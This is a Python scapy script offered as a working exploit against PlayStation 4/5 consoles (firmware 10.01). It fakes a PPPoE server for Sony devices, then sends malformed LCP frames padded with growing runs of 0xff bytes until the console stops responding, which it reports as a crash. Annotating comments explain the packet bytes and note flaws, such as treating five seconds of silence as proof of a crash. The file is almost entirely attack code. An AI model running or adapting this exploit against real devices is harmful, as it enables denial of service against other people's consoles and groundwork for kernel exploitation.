from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump, get_if_hwaddr, conf
from manuf import manuf
import struct
# This exploit works 100% of the time and is persistent, you can leave it running.
# It will automatically get src ip and dst ip
# Sometimes the pppoe client will send out random information (nothing useful)
# connect PC to ps4, ps5
# Setup lan connection with pppoe
# run the script after setting interface (ifconfig /all, or ip addr).
# restart playstation, or network test.
# Enjoy your reboot
# FW: 10.01
# need gadget from kernel dump
# Capture/injection interface name as reported by `ifconfig /all` or `ip addr`.
interface = "Realtek PCIe GbE Family Controller"
# Silence scapy's per-packet send/receive chatter.
conf.verb = False
# Our own MAC: the colon-separated string scapy reports, and the same six octets as raw bytes.
mac_address = get_if_hwaddr(interface)
mac_address_packed = struct.pack('!6B', *(int(octet, 16) for octet in mac_address.split(':')))
# MAC-vendor lookup used later to recognise the peer; update=False skips refreshing the vendor table.
p = manuf.MacParser(update=False)
while True:
    # One handshake attempt per outer iteration. Everything is reset so an address or
    # tag captured from a previous peer never leaks into the next attempt.
    success = False
    src_address = ""
    src_address_packed = b""
    manufacture = ""
    tag_value = ""
    print("Listening for incoming packets from Sony")
    while True:
        # Block until one PPPoE Discovery-stage frame (EtherType 0x8863) arrives.
        packet = sniff(iface=interface, filter="pppoed", count=1)
        try:
            if Ether in packet[0]:
                src_address = packet[0][Ether].src
                src_address_packed = struct.pack('!6B', *[int(byte, 16) for byte in src_address.split(':')])
                # Vendor lookup on the sender's MAC; only Sony-made adapters are answered.
                manufacture = p.get_manuf_long(src_address)
                if "Sony" in manufacture:
                    # Second tag of the first PPPoED frame. The hand-built replies below
                    # re-emit it as an 8-byte Host-Uniq tag (type 0x0103), so this assumes
                    # tag_list has at least two entries and the value is exactly 8 bytes;
                    # neither is checked here.
                    tag_value = packet[PPPoED][0].tag_list[1].tag_value
                    success = True
                    break
        except:
            # NOTE(review): the bare except swallows every error from the frame
            # (missing tag, a None vendor string, ...) and simply waits for the next
            # one; it would also swallow a KeyboardInterrupt raised inside the try body.
            pass
    # The inner loop can only exit through the break above, so success is always True here.
    if (success == False): continue
    print(f"Got source address from playstation! [{src_address}] [{manufacture}] [{tag_value}]")
    # Raw Ethernet frame: dst = peer, src = us, EtherType 0x8863 (PPPoE Discovery), then the
    # PPPoE header ver/type 0x11, code 0x07 (PADO), session 0x0000, length 12, followed by one
    # Host-Uniq tag (0x0103, length 8) echoing tag_value. The log line calls this a "Request";
    # by code it is the access-concentrator offer.
    payload = src_address_packed + mac_address_packed + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
    sendp(payload, iface=interface)
    print("Sent the PPPoE Discovery Request packet")
    # Wait for the peer's next discovery frame (presumably its PADR); its contents are not inspected.
    packet = sniff(iface=interface, filter="pppoed", count=1)
    # Same layout with code 0x65 (PADS) and session id 0x0001 assigned to the peer.
    payload = src_address_packed + mac_address_packed + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
    sendp(payload, iface=interface)
    print("Sent the PPPoE Session Request Packet")
    # Wait for the first Session-stage frame (EtherType 0x8864) from the peer.
    packet = sniff(iface=interface, filter="pppoes", count=1)
    # Session frame: EtherType 0x8864, code 0x00, session 0x0001, declared PPPoE length 9,
    # PPP protocol 0xC021 (LCP), LCP code 0x01 (Configure-Request), id 1, declared LCP
    # length 7 -- but only 8 and 6 bytes respectively are actually supplied, i.e. a
    # malformed LCP frame whose length fields overstate the data present.
    payload = src_address_packed + mac_address_packed + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
    # srp1 sends and waits for one reply; no timeout is given, so this blocks indefinitely
    # if the peer never answers.
    packet = srp1(Ether(payload), iface=interface)
    # i = 0
    # while True:
    # i += 1
    # packet = sniff(iface=interface, filter="pppoes", count=1)
    # payload = src_address_packed + mac_address_packed + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xFF" * i
    # packet = srp1(Ether(payload), iface=interface, timeout=2)
    # if not packet:
    # print("Broke on " + str(i))
    # break
    # hexdump(packet)
    # exit(0)
    print("Sent the PPPoE Session Data Packet with Ethernet II Encapsulation")
    # in network test -> 249
    # in boot -> 22 (ssdp:discover)
    # in network test -> 26 (tCanShortCircuit)
    # Resend the same malformed LCP frame with i trailing 0xff bytes, one more per
    # iteration, until the peer stays silent for 5 s; i is then reported as the
    # payload size at which it stopped responding.
    i = 0
    while True:
        i += 1
        sendp(src_address_packed + mac_address_packed + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * i, iface=interface)
        packet = sniff(iface=interface, filter="pppoes", count=1, timeout=5)
        if not packet:
            # Five seconds of silence is taken as a crash; this cannot distinguish a
            # crash from the peer dropping the session or a cable being unplugged.
            print("We crashed the system on payload " + str(i))
            break
        packet.hexdump()